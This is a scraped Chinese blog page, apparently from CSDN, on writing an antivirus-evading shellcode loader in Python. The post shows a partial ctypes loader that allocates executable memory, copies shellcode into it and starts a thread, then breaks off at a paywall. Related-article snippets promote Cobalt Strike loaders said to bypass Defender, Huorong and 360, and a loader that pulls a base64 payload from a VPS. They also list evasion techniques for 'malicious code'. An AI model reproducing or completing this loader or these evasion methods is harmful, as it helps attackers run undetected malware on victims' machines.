免杀专题(二)loader编写以python为例

最新推荐文章于 2024-07-05 18:31:23 发布
最新推荐文章于 2024-07-05 18:31:23 发布
阅读量1.1k 收藏 4
点赞数 2
分类专栏: 网络安全 文章标签: python 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47224111/article/details/122227817
版权
本文介绍了如何使用Python的ctypes库编写loader,以实现免杀功能。通过调用Windows API,如VirtualAlloc申请内存,RtlMoveMemory复制shellcode,CreateThread创建执行线程,以及WaitForSingleObject监控线程状态,确保shellcode持续运行。最终,通过py2exe打包,成功实现了loader的运行。
摘要由CSDN通过智能技术生成

免杀专题(二)loader编写以python为例

先贴代码

import ctypes

#shellcode加载
def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), 
                                              ctypes.c_int(len(shellcode)), 												  ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))
    
    
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),
                                     		  buf,
                                              ctypes.c_int(len(shellcode)))
    
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0)
最低0.47元/天 解锁文章
hedianshui888
关注
专栏目录
Python函数专题(中)【侯小啾python基础领航计划 系列(十)】
侯小啾技术博客
11-29 192
函数是Python编程中非常重要的概念之一。它使我们能够将代码块封装为可重复使用的模块,从而实现更高效、可维护和可扩展的程序设计。无论是编写简单的脚本还是构建复杂的应用程序,函数都是不可或缺的工具。
python计算生态什么意思_Python计算生态的构建
weixin_34271369的博客
01-13 346
专题的内容结构:第一部分主要是:如何编写Python第三方库(包和模块)第部分主要是:如何编写带有c语言扩展的Python第三方库(包和模块)第一部分的结构:unit1:深入理解Python库:(1),库,模块和包(2),模块的命名空间(3),包的命名空间(4),模块的名称属性unit2:模块和包的构建:(1),模块的构建(2),常规包的构建(3),命名空间包的构建unit3:实例1:矩阵乘法...
免杀专题 (三)对loader进行远程加载
weixin_47224111的博客
12-30 1184
免杀专题 (三)对loader进行远程加载 上一篇写到的loader被各种杀软乱杀 import ctypes #shellcode加载 def shellCodeLoad(shellcode): ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
python3 unittest模块源码解析(四) --- 加载器loader
qq_41437305的博客
07-27 3068
一、loader简介 照惯例,引用官方文档的说明: TheTestLoaderclass is used to create test suites from classes and modules. TestLoader类是用来从类与模块中创建测试套件(即suite)。 、TestLoader类 1、加载测试的几个方法 loader中用来加载测试的最基本方法是lo...
python之_Python之__loader__
weixin_39574869的博客
11-26 357
What is __loader__?__loader__是由加载器在导入的模块上设置的属性,访问它时将会返回加载器对象本身。在Python版本3.3之前,__loader__在内置的导入机制中没有被设置(没有这个属性)。 相反,该属性只适用于使用自定义加载器导入的模块。What is loader?loader是由finder查找器返回的一个对象,它使用的它的load_module()方法来一个...
CS-Loader:CS免杀
03-22
CS-避免杀人 CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0:目前测试可以过Defender /火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5:加入C版本CS免杀(已完成) V1.7:加入Powershell的免杀(已完成) V2.0:开发出UI界面 V2.0:开发成在线免杀平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式更具有扩展性 关于自己写的在线免杀平台,暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我 V3.0:想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender) 依赖环境 Pyt
免杀】C2远控-Loader加载器-动态API调用
qq_55349490的博客
06-10 597
绕过杀毒对导入表的检测定性。
python设计一个circle类_分别设计点类Point和圆类Circle,点类有两个私有数据纵坐标和横坐标;圆类有也两个私有数据圆心和半径,其中圆心是一个点类对象;要求如下所述: (1) 通过构造...
weixin_39992788的博客
11-30 2225
题目相对简单: package naizi; public class Circle { //私有成员及构造方法 private Point center; private int r; Circle(int rr,Point Cc){ this.r=rr; this.center=Cc; } public void showInfo(){ //打印信息 System.out.println("c...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 937
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
免杀笔记 ----> ShellCode Loader !!!
最新发布
huohaowen的博客
07-05 1349
学了那么久的前置知识,终于到了能上线的地方了!!!不过这里还没到免杀的部分,距离bypass一众的杀毒软件还有很长的路要走!!
2021HW-某红队样本简单分析(附免杀shellcodeloader)
J0o1ey Blog
05-27 696
0x01 邮件原文与样本 hw期间内部邮箱网关收到了钓鱼邮件 邮件原文如下 解压后得到样本 财险内部旅游套餐方案.pdf.exe 样本为大小为5.88M,HASH如下 MD5 5bc32973b43593207626c0588fc6247e SHA-1 551414cb283a56cf55817c720c2efee0144ea2ed SHA-256 d12e852eeefa87e75c7876fb53947b979bfbf880eb825eb58b9fe7f0132809ad VT报毒 14/69,免杀
Shellcode免杀对抗(Python)
qq_74806534的博客
02-17 2万+
常用参数 含义 -i 或 -icon 生成icon -F 创建一个绑定的可执行文件 -w 使用窗口,无控制台 -C 使用控制台,无窗口 -D 创建一个包含可执行文件的单文件夹包(默认情况下) -n 文件名。先cs生成payload,此时生成c的和Python应该是效果一样的(x64尽量不开,因为我没有尝试成功)注意在生成的payload是被分行的,放到的代码里的时候,要像CS一样并成一行,很麻烦。先base64,可以过掉火绒,过不了defender/360。
python操作应用程序_python调用win32应用程序
weixin_39804523的博客
11-23 220
1.[代码][Python]代码from ctypes import *kernel32 = windll.kernel32#定义数据结构中的字段类型WORD = c_ushortDWORD = c_ulongLPBYTE = POINTER(c_ubyte)LPTSTR = POINTER(c_char)HANDLE = c_void_p#定义函数中的初始化变...
python无法打开kernel32.lib_pythonkernel32未定义问题,版本2.5
weixin_39533174的博客
12-18 161
from ctypes import *from my_debugger_defines import *kernel23 = windll.kernel32class debugger():def __init__(self):passdef load(self,path_to_exe):creation_flags = DEBUG_PROCESSstartupinfo = STARTUPINF...
浅谈Kernel32.dllWindows平台下必有的动态库文件)
Bobowen的博客
12-09 5705
今天听了前辈的黑客攻击的知识分享,里面比较基础的元素就是Kernel32.dll,我对它感兴趣好久了,今天搜集一些资料,有关Kernel32的。
学习python免杀知识
gou1791241251的博客
01-06 209
#字符串转十六进制 python3.7 import codecs codecs.encode(“shellcode”) 案例: import ctypes import sys import random decode = sys.argv[1].decode(“hex”) n=random.randint(0,len(decode)-1) shellcode = bytearray(decode[:n]+decode[n:]) ptr = ctypes.windll.kernel32.VirtualAl
无法定位程序输入点kernel32.dll,如何修复kernel32.dll
热门推荐
电脑修复君的博客
02-28 3万+
kernel32.dllWindows操作系统中非常重要的一个系统文件,如果它丢失或损坏可能会导致许多应用程序无法正常运行。今天小编就来给大家详细的讲解一下无法定位程序输入点kernel32.dll,我们要怎么修复这个kernel32.dll缺失的问题。
(记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)
daxi0ng的博客
01-31 1771
1、首先cs生成一个64位的Python Payload 2、截取其中的Payload,并进行base64编码。 3、把这一串子base64放到VPS上。并开启web服务。 python3 -m http.server 7777 4、使用以下脚本。将Python Payload进行反序列化。 import pickle import base64 shellcode = """ import ctypes,urllib.request,codecs,base64
python序列化和反序列化_python反序列化免杀
weixin_39789042的博客
01-31 681
在日常的渗透行动当中,当我们对目标进行内网横向渗透时很不幸的是内网一般往往都会部署防火墙、流量监控等设备,杀软更是成为了服务器的标配,所以如何进行免杀绕过杀毒软件的限制让主机上线成了我们首要解决的问题之一下面使用python反序列化进行免杀这是python原始shellcode加载方式importctypesshellcode=b"\xfc\x48\x83\xe4\xf0\xe8....
python 免杀
09-11
Python免杀是指在编写Python恶意代码时,通过一系列技术手段绕过杀毒软件的检测和阻止。在进行Python免杀时,可以采取多种常用的静态免杀技术,如特征码定位修改、填充花指令、文件加壳、内存执行、shellcode混淆、shellcode和loader分离、木马资源修改和调用系统白名单等。这些技术可以帮助我们在编写Python恶意代码时避免被杀毒软件检测到。 其中,特征码定位修改是指通过修改代码中的特征码或者特征码的位置,使得杀毒软件无法识别恶意代码。填充花指令是在代码中插入一些无实际功能的指令,以混淆代码结构,增加杀毒软件的分析难度。文件加壳是将恶意代码嵌入到其他可信的文件中,以绕过杀毒软件的检测。内存执行是将恶意代码直接加载到内存中执行,避免了被杀毒软件静态检测的可能。shellcode混淆是通过对shellcode进行变形或加密,使其难以被杀毒软件识别。shellcode和loader分离是将shellcode和加载器分离,使得杀毒软件难以检测到完整的恶意代码。木马资源修改是通过修改恶意代码所依赖的资源文件或者库文件,绕过杀毒软件的检测。调用系统白名单是指利用操作系统的合法功能或者系统自带的程序来执行恶意代码,使其被认为是正常行为而不被杀毒软件拦截。 需要注意的是,不同语言的shellcode和loader免杀效果上有所差异,而Python免杀中的效果相对较好。此外,选择小众语言和不同的exe打包器也可以提高免杀效果。同时,在编写Python恶意代码时,尽量避免使用敏感词汇,以降低被杀毒软件查杀的概率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值